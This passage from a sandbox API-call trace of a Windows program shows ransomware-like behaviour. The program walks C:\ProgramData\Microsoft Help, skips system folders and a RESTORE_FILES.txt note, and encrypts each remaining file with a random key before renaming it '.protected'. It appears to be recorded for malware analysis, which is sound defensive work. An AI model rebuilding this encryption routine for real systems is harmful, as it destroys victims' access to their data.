lpNumberOfBytesRead=0x295f3e4*=0x15e, lpOverlapped=0x0) returned 1 [0072.632] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffea2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.632] WriteFile (in: hFile=0xa4, lpBuffer=0x49d448*, nNumberOfBytesToWrite=0x15e, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesWritten=0x295f3e4*=0x15e, lpOverlapped=0x0) returned 1 [0072.633] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.633] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.633] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.633] CloseHandle (hObject=0xa4) returned 1 [0072.633] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn.protected") returned 68 [0072.633] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.dev.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.visio.dev.14.1033.hxn.protected")) returned 1 [0072.634] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.634] lstrcmpiW (lpString1="MS.VISIO.SHAPESHEET.14.1033.hxn", lpString2="Windows") returned -1 [0072.634] lstrcmpiW (lpString1="MS.VISIO.SHAPESHEET.14.1033.hxn", lpString2="Program Files") returned -1 [0072.634] lstrcmpiW (lpString1="MS.VISIO.SHAPESHEET.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.634] lstrcmpiW (lpString1="MS.VISIO.SHAPESHEET.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.634] lstrcmpiW (lpString1="MS.VISIO.SHAPESHEET.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.634] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn") returned 65 [0072.634] StrStrIW (lpFirst="MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.634] lstrcmpW (lpString1="MS.VISIO.SHAPESHEET.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.634] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.634] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.634] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.shapesheet.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.634] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn") returned 65 [0072.634] StrStrW (lpFirst="MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.634] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn") returned 65 [0072.634] StrStrW (lpFirst="MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.634] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn") returned 65 [0072.634] StrStrW (lpFirst="MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.634] ReadFile (in: hFile=0xa4, lpBuffer=0x49d448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesRead=0x295f3e4*=0x188, lpOverlapped=0x0) returned 1 [0072.635] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffe78, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.635] WriteFile (in: hFile=0xa4, lpBuffer=0x49d448*, nNumberOfBytesToWrite=0x188, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesWritten=0x295f3e4*=0x188, lpOverlapped=0x0) returned 1 [0072.636] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.636] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.636] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.636] CloseHandle (hObject=0xa4) returned 1 [0072.636] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn.protected") returned 75 [0072.636] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.shapesheet.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.visio.shapesheet.14.1033.hxn.protected")) returned 1 [0072.637] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.637] lstrcmpiW (lpString1="MS.VISIO_PRM.14.1033.hxn", lpString2="Windows") returned -1 [0072.637] lstrcmpiW (lpString1="MS.VISIO_PRM.14.1033.hxn", lpString2="Program Files") returned -1 [0072.637] lstrcmpiW (lpString1="MS.VISIO_PRM.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.637] lstrcmpiW (lpString1="MS.VISIO_PRM.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.637] lstrcmpiW (lpString1="MS.VISIO_PRM.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.637] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn") returned 58 [0072.637] StrStrIW (lpFirst="MS.VISIO_PRM.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.637] lstrcmpW (lpString1="MS.VISIO_PRM.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.637] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.637] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.637] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio_prm.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.663] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn") returned 58 [0072.664] StrStrW (lpFirst="MS.VISIO_PRM.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.666] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn") returned 58 [0072.666] StrStrW (lpFirst="MS.VISIO_PRM.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.667] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn") returned 58 [0072.668] StrStrW (lpFirst="MS.VISIO_PRM.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.673] ReadFile (in: hFile=0xa4, lpBuffer=0x49d448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesRead=0x295f3e4*=0x15e, lpOverlapped=0x0) returned 1 [0072.876] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffea2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.876] WriteFile (in: hFile=0xa4, lpBuffer=0x49d448*, nNumberOfBytesToWrite=0x15e, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesWritten=0x295f3e4*=0x15e, lpOverlapped=0x0) returned 1 [0072.876] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.876] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.876] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.876] CloseHandle (hObject=0xa4) returned 1 [0072.877] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn.protected") returned 68 [0072.877] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio_prm.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.visio_prm.14.1033.hxn.protected")) returned 1 [0072.877] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.877] lstrcmpiW (lpString1="MS.VISIO_STD.14.1033.hxn", lpString2="Windows") returned -1 [0072.877] lstrcmpiW (lpString1="MS.VISIO_STD.14.1033.hxn", lpString2="Program Files") returned -1 [0072.877] lstrcmpiW (lpString1="MS.VISIO_STD.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.877] lstrcmpiW (lpString1="MS.VISIO_STD.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.877] lstrcmpiW (lpString1="MS.VISIO_STD.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.877] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn") returned 58 [0072.877] StrStrIW (lpFirst="MS.VISIO_STD.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.877] lstrcmpW (lpString1="MS.VISIO_STD.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.877] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.877] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.877] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio_std.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.878] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn") returned 58 [0072.878] StrStrW (lpFirst="MS.VISIO_STD.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.878] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn") returned 58 [0072.878] StrStrW (lpFirst="MS.VISIO_STD.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.878] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn") returned 58 [0072.878] StrStrW (lpFirst="MS.VISIO_STD.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.878] ReadFile (in: hFile=0xa4, lpBuffer=0x49d448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesRead=0x295f3e4*=0x15e, lpOverlapped=0x0) returned 1 [0072.879] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffea2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.879] WriteFile (in: hFile=0xa4, lpBuffer=0x49d448*, nNumberOfBytesToWrite=0x15e, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesWritten=0x295f3e4*=0x15e, lpOverlapped=0x0) returned 1 [0072.879] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.879] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.879] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.879] CloseHandle (hObject=0xa4) returned 1 [0072.879] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn.protected") returned 68 [0072.880] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio_std.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.visio_std.14.1033.hxn.protected")) returned 1 [0072.880] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.880] lstrcmpiW (lpString1="MS.WINPROJ.14.1033.hxn", lpString2="Windows") returned -1 [0072.880] lstrcmpiW (lpString1="MS.WINPROJ.14.1033.hxn", lpString2="Program Files") returned -1 [0072.880] lstrcmpiW (lpString1="MS.WINPROJ.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.880] lstrcmpiW (lpString1="MS.WINPROJ.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.880] lstrcmpiW (lpString1="MS.WINPROJ.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.880] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn") returned 56 [0072.880] StrStrIW (lpFirst="MS.WINPROJ.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.880] lstrcmpW (lpString1="MS.WINPROJ.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.880] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.880] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.880] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.880] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn") returned 56 [0072.880] StrStrW (lpFirst="MS.WINPROJ.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.880] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn") returned 56 [0072.880] StrStrW (lpFirst="MS.WINPROJ.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.880] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn") returned 56 [0072.880] StrStrW (lpFirst="MS.WINPROJ.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.881] ReadFile (in: hFile=0xa4, lpBuffer=0x49d448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesRead=0x295f3e4*=0x152, lpOverlapped=0x0) returned 1 [0072.881] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffeae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.881] WriteFile (in: hFile=0xa4, lpBuffer=0x49d448*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesWritten=0x295f3e4*=0x152, lpOverlapped=0x0) returned 1 [0072.882] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.882] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.882] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.882] CloseHandle (hObject=0xa4) returned 1 [0072.882] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn.protected") returned 66 [0072.882] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.14.1033.hxn.protected")) returned 1 [0072.883] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.883] lstrcmpiW (lpString1="MS.WINPROJ.DEV.14.1033.hxn", lpString2="Windows") returned -1 [0072.883] lstrcmpiW (lpString1="MS.WINPROJ.DEV.14.1033.hxn", lpString2="Program Files") returned -1 [0072.883] lstrcmpiW (lpString1="MS.WINPROJ.DEV.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.883] lstrcmpiW (lpString1="MS.WINPROJ.DEV.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.883] lstrcmpiW (lpString1="MS.WINPROJ.DEV.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.883] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn") returned 60 [0072.883] StrStrIW (lpFirst="MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.883] lstrcmpW (lpString1="MS.WINPROJ.DEV.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.883] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.883] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.883] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.884] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn") returned 60 [0072.884] StrStrW (lpFirst="MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.884] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn") returned 60 [0072.884] StrStrW (lpFirst="MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.884] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn") returned 60 [0072.884] StrStrW (lpFirst="MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.884] ReadFile (in: hFile=0xa4, lpBuffer=0x49d448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesRead=0x295f3e4*=0x16a, lpOverlapped=0x0) returned 1 [0072.884] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffe96, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.885] WriteFile (in: hFile=0xa4, lpBuffer=0x49d448*, nNumberOfBytesToWrite=0x16a, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesWritten=0x295f3e4*=0x16a, lpOverlapped=0x0) returned 1 [0072.885] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.885] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.885] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.885] CloseHandle (hObject=0xa4) returned 1 [0072.885] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn.protected") returned 70 [0072.885] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.dev.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.dev.14.1033.hxn.protected")) returned 1 [0072.886] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.886] lstrcmpiW (lpString1="MS.WINWORD.14.1033.hxn", lpString2="Windows") returned -1 [0072.886] lstrcmpiW (lpString1="MS.WINWORD.14.1033.hxn", lpString2="Program Files") returned -1 [0072.886] lstrcmpiW (lpString1="MS.WINWORD.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.886] lstrcmpiW (lpString1="MS.WINWORD.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.886] lstrcmpiW (lpString1="MS.WINWORD.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.886] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn") returned 56 [0072.886] StrStrIW (lpFirst="MS.WINWORD.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.886] lstrcmpW (lpString1="MS.WINWORD.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.886] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.886] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.886] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winword.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.887] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn") returned 56 [0072.887] StrStrW (lpFirst="MS.WINWORD.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.887] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn") returned 56 [0072.887] StrStrW (lpFirst="MS.WINWORD.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.887] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn") returned 56 